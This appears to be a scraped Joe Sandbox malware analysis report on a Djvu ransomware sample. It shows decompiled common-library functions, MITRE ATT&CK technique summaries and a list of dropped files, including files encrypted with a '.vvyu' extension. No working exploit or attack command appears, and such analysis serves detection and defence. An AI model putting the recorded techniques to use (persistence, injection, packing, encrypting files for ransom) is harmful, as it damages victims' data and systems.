0x00413c50
0x00413c57
0x00413c60
0x00413c8e
0x00413c93
0x00413c62
0x00413c62
0x00413c65
0x00413c96
0x00413c9b
0x00000000
0x00413c67
0x00413c68
0x00413c6d
0x00413c72
0x00413ca0
0x00413ca0
0x00413ca5
0x00413ca6
0x00413ca7
0x00413ca8
0x00413ca9
0x00413caa
0x00413cab
0x00413cac
0x00413cad
0x00413cae
0x00413caf
0x00413cb0
0x00413cb1
0x00413cb3
0x00413cb5
0x00413cb7
0x00413cba
0x00413cc2
0x00413cc8
0x00413ccf
0x00413ccf
0x00413cd7
0x00413c74
0x00413c78
0x00413c7d
0x00413c80
0x00413c83
0x00413c8b
0x00000000
0x00413c8b
0x00413c72
0x00413c65

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

_memset.LIBCMT ref: 00413C83

Strings

vector<T> too long, xrefs: 00413C96

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
String ID: vector<T> too long
API String ID: 1327501947-3788999226
Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00480620(void* __ebx, void* __edx, void* __ebp, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				void* _t13;
				intOrPtr* _t15;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t31;
				void* _t32;

				_t29 = _a4;
				_t10 =  *_t29;
				_t34 =  *((intOrPtr*)(_t10 + 8)) - 0x40;
				if( *((intOrPtr*)(_t10 + 8)) > 0x40) {
					E00454C00(__ebx, __edx, _t27, _t29, __ebp, _t34, ".\\crypto\\evp\\digest.c", 0x10f, "ctx->digest->md_size <= EVP_MAX_MD_SIZE");
					_t31 = _t31 + 0xc;
				}
				_t13 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x18))))(_t29, _a8);
				_t26 = _a12;
				_t32 = _t31 + 8;
				_t28 = _t13;
				if(_t26 != 0) {
					 *_t26 =  *((intOrPtr*)( *_t29 + 8));
				}
				_t15 =  *((intOrPtr*)( *_t29 + 0x20));
				if(_t15 != 0) {
					 *_t15(_t29);
					E0047D100(_t29, 2);
					_t32 = _t32 + 0xc;
				}
				E0042B420( *((intOrPtr*)(_t29 + 0xc)), 0,  *((intOrPtr*)( *_t29 + 0x44)));
				return _t28;
			}

0x00480621
0x00480626
0x00480628
0x0048062c
0x0048063d
0x00480642
0x00480642
0x0048064f
0x00480651
0x00480655
0x00480658
0x0048065c
0x00480663
0x00480663
0x00480667
0x0048066c
0x0048066f
0x00480674
0x00480679
0x00480679
0x00480686
0x00480692

APIs

_memset.LIBCMT ref: 00480686

Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18

Strings

ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
.\crypto\evp\digest.c, xrefs: 00480638

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _memset_raise
String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
API String ID: 1484197835-3867593797
Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99

Uniqueness

Uniqueness Score: -1.00%

Function 004242A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C,?,00427F58,00000003,00428BB9,00507BD0,00000008,00428B0E,i;B), ref: 004242B0
__invoke_watson.LIBCMT ref: 004242CC

Strings

i;B, xrefs: 004242C9

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: DecodePointer__invoke_watson
String ID: i;B
API String ID: 4034010525-472376889
Opcode ID: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
Instruction ID: 4f0f565c0ac0667cc87bbfc5f091dd064a73676b217a34b06ab6fef57441037f
Opcode Fuzzy Hash: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
Instruction Fuzzy Hash: D2E0EC31510119FBDF012FA2EC05DAA3B69FF44294B8044A5FE1480171D776C870ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0044F23E(void* __eflags, char _a4) {
				char _v12;
				char _v16;
				char _v32;
				char _v40;
				char _v60;
				intOrPtr _v68;
				char _v92;
				char _v100;
				char _v120;
				void* _t58;
				void* _t63;
				void* _t64;
				void* _t65;

				_t58 = _t63;
				_t64 = _t63 - 0xc;
				E00430CFC( &_v16,  &_a4);
				_v16 = 0x4d6554;
				E00430ECA( &_v16, 0x5081fc);
				asm("int3");
				_push(_t58);
				_t65 = _t64 - 0xc;
				E00430CFC( &_v32,  &_v12);
				_v32 = 0x4d6560;
				E00430ECA( &_v32, 0x508238);
				asm("int3");
				_push(_t64);
				E00430CFC( &_v60,  &_v40);
				_v60 = 0x4d6578;
				E00430ECA( &_v60, 0x508274);
				asm("int3");
				_push(_t65);
				E0044EF74( &_v92, _v68);
				E00430ECA( &_v92, 0x508320);
				asm("int3");
				_push(_t65 - 0xc);
				E00430CFC( &_v120,  &_v100);
				_v120 = 0x4d656c;
				E00430ECA( &_v120, 0x5082cc);
				asm("int3");
				return "bad function call";
			}

0x0044f23f
0x0044f241
0x0044f251
0x0044f25e
0x0044f266
0x0044f26b
0x0044f26c
0x0044f26f
0x0044f27f
0x0044f28c
0x0044f294
0x0044f299
0x0044f29a
0x0044f2ad
0x0044f2ba
0x0044f2c2
0x0044f2c7
0x0044f2c8
0x0044f2d4
0x0044f2e2
0x0044f2e7
0x0044f2e8
0x0044f2fb
0x0044f308
0x0044f310
0x0044f315
0x0044f31b

APIs

std::exception::exception.LIBCMT ref: 0044F251

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F266

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

TeM, xrefs: 0044F25B, 0044F247

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: TeM
API String ID: 757275642-2215902641
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bE5aaTiJM0.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Djvu

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\SystemID\PersonalID.txt

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.vvyu (copy)

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\7D5KIW2V\www.msn[1].xml

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\7D5KIW2V\www.msn[1].xml.vvyu (copy)

C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe

C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\get[1].htm

C:\Users\user\AppData\Local\bowsakkdestx.txt

C:\Users\user\Desktop\BJZFPPWAPT.pdf

C:\Users\user\Desktop\BJZFPPWAPT.pdf.vvyu (copy)

C:\Users\user\Desktop\BJZFPPWAPT.xlsx

C:\Users\user\Desktop\BJZFPPWAPT.xlsx.vvyu (copy)

C:\Users\user\Desktop\BNAGMGSPLO.docx

C:\Users\user\Desktop\BNAGMGSPLO.docx.vvyu (copy)

C:\Users\user\Desktop\BNAGMGSPLO\BNAGMGSPLO.docx

Windows Analysis Report
bE5aaTiJM0.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre